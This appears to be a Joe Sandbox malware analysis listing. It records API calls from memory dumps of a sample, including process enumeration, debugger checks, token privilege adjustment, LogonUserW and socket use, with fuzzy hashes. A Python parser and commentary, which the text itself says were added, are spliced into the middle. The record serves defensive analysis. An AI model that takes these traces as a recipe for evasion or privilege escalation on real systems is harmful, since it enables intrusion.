                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                                  • API String ID: 2574300362-192647395
                                                                                                                                                  • Opcode ID: a73fa7ec54199ac5cd1cc7a5405e6f37b5fe8d156d6918c0c451661c08ead94f
                                                                                                                                                  • Instruction ID: eac2b9657e48c1354d3ce07b29e145d4c0a45f8badf8df95cafcbf2a1bd35060
                                                                                                                                                  • Opcode Fuzzy Hash: a73fa7ec54199ac5cd1cc7a5405e6f37b5fe8d156d6918c0c451661c08ead94f
                                                                                                                                                  • Instruction Fuzzy Hash: 8ED01274A10713CFD720AF31D818B0A76E4AF45751B218C3F9485D6690D678F8C4C75C
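The per-function entries above (API sequence with arguments and call-site addresses, the "String ID" strings, and the opcode/instruction fuzzy hashes) are easier to triage and to pivot on when they are parsed into records rather than read by eye. The following is an added example, not part of the Joe Sandbox report and not Joe Sandbox's own code: a small parser for the listing format as it appears on this page, plus a few behaviour tags of my own. The tag names and the API-combination rules are assumptions for illustration, not Joe Sandbox signatures; the sample input is constructed from three of the entries above, trimmed to the fields the parser reads.

```python
import re
from dataclasses import dataclass, field

# Constructed sample input: fragments of three function entries copied from the
# listing above, trimmed to the fields the parser reads (not a full report).
SAMPLE = """\
APIs
• socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 0047679E
• WSAGetLastError.WSOCK32(00000000), ref: 004767C7
• bind.WSOCK32(00000000,?,00000010), ref: 00476800
• closesocket.WSOCK32(00000000,00000000), ref: 00476821
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
Similarity
• API ID: ErrorLast$bindclosesocketinet_addrsocket
• String ID:
• Opcode Fuzzy Hash: c3678cbd9f04907b78b21f7c60552e65a77e2ac58af8dde8cfff1331ff6b0f68
APIs
• CoInitialize.OLE32(00000000), ref: 0046C432
• CoCreateInstance.OLE32(00492D6C,00000000,00000001,00492BDC,?), ref: 0046C44A
  • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
• CoUninitialize.OLE32 ref: 0046C6B7
Similarity
• String ID: .lnk
• Opcode Fuzzy Hash: 2168bc15797479d4bf9d8be8a874f14214ce5ae81521c48187290a1a744f77cd
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 0047EE3D
• Process32FirstW.KERNEL32(00000000,?), ref: 0047EE4B
• Process32NextW.KERNEL32(00000000,?), ref: 0047EF0B
• CloseHandle.KERNEL32(00000000,?,?,?), ref: 0047EF1A
"""

# One API line: optional "Part of subcall function XXXX:" prefix, then
# Name.MODULE(arg,arg,...), ref: ADDRESS  (argument list may be absent).
API_RE = re.compile(
    r"^\s*•\s*(?P<sub>Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<name>[^.\s(]+)\.(?P<mod>[A-Za-z0-9_]+)"
    r"(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
# Any other bullet is a "Key: value" pair (Source File, String ID, fuzzy hashes, ...).
KV_RE = re.compile(r"^\s*•\s*(?P<key>[^:]+):\s*(?P<val>.*)$")


@dataclass
class ApiCall:
    name: str
    module: str
    args: list          # raw argument tokens as printed, e.g. "00000002" or "?"
    ref: int            # call-site address
    via_subcall: bool   # True for "Part of subcall function" lines


@dataclass
class FuncEntry:
    apis: list = field(default_factory=list)
    meta: dict = field(default_factory=dict)

    @property
    def strings(self):
        # "String ID" joins referenced strings with "$" (e.g. GetNativeSystemInfo$kernel32.dll)
        return [s for s in self.meta.get("String ID", "").split("$") if s]

    @property
    def opcode_hash(self):
        return self.meta.get("Opcode Fuzzy Hash", "")


def parse_entries(text):
    """Split the listing into FuncEntry records; every 'APIs' header starts a new one."""
    entries, section = [], None
    for line in text.splitlines():
        if not line.strip():
            continue
        if not line.lstrip().startswith("•"):      # non-bullet line = section header
            section = line.strip()
            if section == "APIs":
                entries.append(FuncEntry())
            continue
        if not entries:
            continue
        if section == "APIs":
            m = API_RE.match(line)
            if m:
                args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
                entries[-1].apis.append(
                    ApiCall(m["name"], m["mod"], args, int(m["ref"], 16), bool(m["sub"])))
        else:
            m = KV_RE.match(line)
            if m:
                entries[-1].meta[m["key"].strip()] = m["val"].strip()
    return entries


def tag_entry(e):
    """Heuristic behaviour tags (assumption: my own mapping, not Joe Sandbox's)."""
    direct = {a.name for a in e.apis if not a.via_subcall}
    tags = []
    if {"CreateToolhelp32Snapshot", "Process32NextW"} <= direct:
        tags.append("process-enumeration")
    if {"socket", "bind"} <= direct:
        sock = next(a for a in e.apis if a.name == "socket")
        # socket(af, type, protocol): 2, 2, 0x11 == AF_INET, SOCK_DGRAM, IPPROTO_UDP
        udp = sock.args[:3] == ["00000002", "00000002", "00000011"]
        tags.append("udp-bind" if udp else "socket-bind")
    if "CoCreateInstance" in direct and ".lnk" in e.strings:
        tags.append("shell-link-creation")
    if "GetTokenInformation" in direct:
        tags.append("token-query")
    if {"LoadLibraryA", "GetProcAddress"} <= direct:
        tags.append("dynamic-import")
    return tags


def index_by_opcode_hash(entries):
    """Pivot table: Opcode Fuzzy Hash -> tags, for matching functions across reports."""
    return {e.opcode_hash: tag_entry(e) for e in entries if e.opcode_hash}


if __name__ == "__main__":
    for e in parse_entries(SAMPLE):
        print([a.name for a in e.apis], e.strings, tag_entry(e))
```

The opcode fuzzy hash is the useful pivot key: the same runtime function compiled into another sample of the same family tends to keep its hash even when addresses and surrounding code differ, so a table keyed on it lets you carry tags from a reviewed report to a fresh one without re-reading the disassembly.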
APIs
• CreateToolhelp32Snapshot.KERNEL32 ref: 0047EE3D
• Process32FirstW.KERNEL32(00000000,?), ref: 0047EE4B
  • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
• Process32NextW.KERNEL32(00000000,?), ref: 0047EF0B
• CloseHandle.KERNEL32(00000000,?,?,?), ref: 0047EF1A
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32_memmove
• String ID:
• API String ID: 2576544623-0
APIs
• lstrlenW.KERNEL32(?,?,?,00000000), ref: 0045E628
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: lstrlen
• String ID: ($|
• API String ID: 1659193697-1631851259
APIs
• InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,0047180A,00000000), ref: 004723E1
• InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00472418
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: Internet$AvailableDataFileQueryRead
• String ID:
• API String ID: 599397726-0
APIs
• IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 00AB1459
• SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 00AB1463
• UnhandledExceptionFilter.KERNEL32(-00000328,?,?,?,?,?,00000000), ref: 00AB1470
Memory Dump Source
• Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_a70000_x.jbxd
Similarity
• API ID: ExceptionFilterUnhandled$DebuggerPresent
• String ID:
• API String ID: 3906539128-0
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0046B343
• GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 0046B39D
• SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 0046B3EA
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: ErrorMode$DiskFreeSpace
• String ID:
• API String ID: 1682464887-0
APIs
  • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
  • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
• LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0045882B
• AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00458858
• GetLastError.KERNEL32 ref: 00458865
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
• String ID:
• API String ID: 1922334811-0
APIs
• AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 00458774
• CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 0045878B
• FreeSid.ADVAPI32(?), ref: 0045879B
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
• Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: AllocateCheckFreeInitializeMembershipToken
• String ID:
• API String ID: 3429775523-0
                                                                                                                                                  • Opcode ID: 008726f0c27652ffd03f151f72c22d205906185045b9f325022e2ab268aa6496
                                                                                                                                                  • Instruction ID: 222101879978235e3db2a0a583f2c1bf244a93baf2b2f2d6b5292d8d16c370cf
                                                                                                                                                  • Opcode Fuzzy Hash: 008726f0c27652ffd03f151f72c22d205906185045b9f325022e2ab268aa6496
                                                                                                                                                  • Instruction Fuzzy Hash: 4CF04F7591130CBFDF00DFF4DC89AAEB7BCEF09201F104879A901E2181D7756A088B54
APIs
• GetCurrentProcess.KERNEL32(00000003,?,00AB3F13,00000003,00ACDE80,0000000C,00AB403D,00000003,00000002,00000000,?,00AB2038,00000003), ref: 00AB3F5E
• TerminateProcess.KERNEL32(00000000,?,00AB3F13,00000003,00ACDE80,0000000C,00AB403D,00000003,00000002,00000000,?,00AB2038,00000003), ref: 00AB3F65
• ExitProcess.KERNEL32 ref: 00AB3F77
Memory Dump Source
• Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_a70000_x.jbxd
Similarity
• API ID: Process$CurrentExitTerminate
• String ID:
• API String ID: 1703294689-0
• Opcode ID: 94972aff597f70eb2123596cbaac9ec023aea736b58e063f5fa078194bb2c091
• Instruction ID: 690b9280347671f6a2cae573db35d82ef6feba7aa4fe7a35589629bca615b9a3
• Opcode Fuzzy Hash: 94972aff597f70eb2123596cbaac9ec023aea736b58e063f5fa078194bb2c091
• Instruction Fuzzy Hash: 6CE0B632404A08ABCF11AFA9ED09AA93B7DEB54781F044518F9459A133DB39DE43DB81
APIs
• __time64.LIBCMT ref: 0046889B
  • Part of subcall function 0042520A: GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,00468F6E,00000000,?,?,?,?,0046911F,00000000,?), ref: 00425213
  • Part of subcall function 0042520A: __aulldiv.LIBCMT ref: 00425233
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: Time$FileSystem__aulldiv__time64
• String ID: 0eL
• API String ID: 2893107130-3167399643
• Opcode ID: 173a61627ebe1b4304b39b54128586dabbe463c8e4c1c1e482927ec7599268c1
• Instruction ID: 2c57299538d283c5d644ae0a39161a0e0d0ec28ce0c746f6c7e9e831f8b60585
• Opcode Fuzzy Hash: 173a61627ebe1b4304b39b54128586dabbe463c8e4c1c1e482927ec7599268c1
• Instruction Fuzzy Hash: B421AF326256108BC729CF29D841A52B3E1EFA5311B698F6DD0F5CB2C0DA38A905CB58
APIs
• FindFirstFileW.KERNEL32(?,?), ref: 0046C6FB
• FindClose.KERNEL32(00000000), ref: 0046C72B
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: Find$CloseFileFirst
• String ID:
• API String ID: 2295610775-0
• Opcode ID: 45c62872381a6feff6d223480115480bdbba5ccbc8d99e64919f1b60502656e7
• Instruction ID: b4b64e4e0be63edce78860a78e1dfdfe78961efcf08952f795b51eb70efe8952
• Opcode Fuzzy Hash: 45c62872381a6feff6d223480115480bdbba5ccbc8d99e64919f1b60502656e7
• Instruction Fuzzy Hash: 411152726106049FDB10EF29D88592AF7E5EF85325F00C52EF9A5D7391DB34AC05CB85
APIs
• GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00479468,?,0048FB84,?), ref: 0046A097
• FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00479468,?,0048FB84,?), ref: 0046A0A9
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: ErrorFormatLastMessage
• String ID:
• API String ID: 3479602957-0
• Opcode ID: aedf4ef7b819e7061a1d9f91078b4e07f1c96d427ff214e73d92c0d6c6dea44e
• Instruction ID: 2c9db32d3ae4548df1de74cdb7d607b6943671b75e71bd67b23ca617ca970478
• Opcode Fuzzy Hash: aedf4ef7b819e7061a1d9f91078b4e07f1c96d427ff214e73d92c0d6c6dea44e
• Instruction Fuzzy Hash: D8F0823550522DABDB21AFA4CC48FEE776CBF08361F00416AF909E6191DA349954CBA6
APIs
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00458309), ref: 004581E0
• CloseHandle.KERNEL32(?,?,00458309), ref: 004581F2
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: AdjustCloseHandlePrivilegesToken
• String ID:
• API String ID: 81990902-0
• Opcode ID: 9ec38f7879727ea9b1300892ff3550b9fff1aaeeeffd9baaebef182c4f9d335e
• Instruction ID: 9bafbd08ffd8acbbb2d026fb6ea58a2c51283803ccb0941fee12b6a17b14d6d6
• Opcode Fuzzy Hash: 9ec38f7879727ea9b1300892ff3550b9fff1aaeeeffd9baaebef182c4f9d335e
• Instruction Fuzzy Hash: 13E04632000620AEE7212B61FC08D777BEAEB04314720882EB8A680431CF22AC90DB18
APIs
• SetUnhandledExceptionFilter.KERNEL32(00000000,00494178,00428D57,00493E50,?,?,00000001), ref: 0042A15A
• UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 0042A163
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: ExceptionFilterUnhandled
• String ID:
• API String ID: 3192549508-0
• Opcode ID: c2bfc4d91f5eef072ecd4d4a99461c52a82975f392c39b974fa7ca05b3ef40fa
• Instruction ID: 9da78fce3b57c7d2137df8720d13279edd616241823e717daaa40eb201d223bb
• Opcode Fuzzy Hash: c2bfc4d91f5eef072ecd4d4a99461c52a82975f392c39b974fa7ca05b3ef40fa
• Instruction Fuzzy Hash: CCB09231254308ABCA022B91EC09B8C3F68EB46AA2F404434FA0D84C60CB6254548B99
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: fe7d9b8eee1d273b37d623b7cc6cd26b30c9621dfee01b7311cae72a06f2c816
• Instruction ID: 9dbe1c865c2330f56ffee62ed517aae1867acb93b770053fb6672ec4a27fddfc
• Opcode Fuzzy Hash: fe7d9b8eee1d273b37d623b7cc6cd26b30c9621dfee01b7311cae72a06f2c816
• Instruction Fuzzy Hash: 08322861E29F114DD7239634D832336A258AFB73C8F95D737F819B5AA5EB28D4C34208
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 9a83e6c9a1e03463649304356993a4cc28f03311dd18012bd76db8a2bb8b356c
                                                                                                                                                  • Instruction ID: 6c6381ca5121d9a8a5ca5470a2620081c1b3ce1be078dbaf297b8ac86cff2730
                                                                                                                                                  • Opcode Fuzzy Hash: 9a83e6c9a1e03463649304356993a4cc28f03311dd18012bd76db8a2bb8b356c
                                                                                                                                                  • Instruction Fuzzy Hash: E2B10130E2AF414DD72396398935336BA5CAFBB2C5F51D72BFC2670D22EB2185934185
                                                                                                                                                  APIs
                                                                                                                                                  • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00AB399E,?,?,00000008,?,?,00AB1CF4,00000000), ref: 00AB3BD0
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_a70000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ExceptionRaise
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3997070919-0
                                                                                                                                                  • Opcode ID: f3cf5f771349bf8ebeb3ac5739d3ac5e231c142fd5f5321c95d1e107bfb400fe
                                                                                                                                                  • Instruction ID: ef46625009f3024a1ed92c7101c7f426fd9dbe959c06b4052e02428e04ec9048
                                                                                                                                                  • Opcode Fuzzy Hash: f3cf5f771349bf8ebeb3ac5739d3ac5e231c142fd5f5321c95d1e107bfb400fe
                                                                                                                                                  • Instruction Fuzzy Hash: 7BB11D321106089FDB15CF28C48ABA57BE4FF45364F25865CE8DACF2A2C735DA95CB40
                                                                                                                                                  APIs
                                                                                                                                                  • mouse_event.USER32(00000004,00000000,00000000,00000000,00000000), ref: 00464C76
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: mouse_event
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2434400541-0
                                                                                                                                                  • Opcode ID: ee9df15493a40b048f6a63b66618f3ae232bfa5e5e2bfa15106318706817909b
                                                                                                                                                  • Instruction ID: b34e2a9394489d035c963e7dd8f40c9807a13273b0ab6c7f74163ad9f46ae88e
                                                                                                                                                  • Opcode Fuzzy Hash: ee9df15493a40b048f6a63b66618f3ae232bfa5e5e2bfa15106318706817909b
                                                                                                                                                  • Instruction Fuzzy Hash: BED05EA032220838ECA807209D5FF7F1109E3C0B81F96854B7241853C1F8DC6801A03F
                                                                                                                                                  APIs
                                                                                                                                                  • LogonUserW.ADVAPI32(?,00000001,?,?,00000000,00458389), ref: 004587D1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LogonUser
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1244722697-0
                                                                                                                                                  • Opcode ID: 18205445d52b48e02bcf404b6a946f346a5f79f7dd958708f793c28153997f24
                                                                                                                                                  • Instruction ID: bbaf709efb0beb88cdfa5f1a33ae6004459e2c5163e494cc38a8a30eb56211a1
                                                                                                                                                  • Opcode Fuzzy Hash: 18205445d52b48e02bcf404b6a946f346a5f79f7dd958708f793c28153997f24
                                                                                                                                                  • Instruction Fuzzy Hash: 49D05E3226050EAFEF018EA4DC01EAE3B69EB04B01F408521FE15D50A1C775E835AB60
                                                                                                                                                  APIs
                                                                                                                                                  • SetUnhandledExceptionFilter.KERNEL32(?), ref: 0042A12A
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
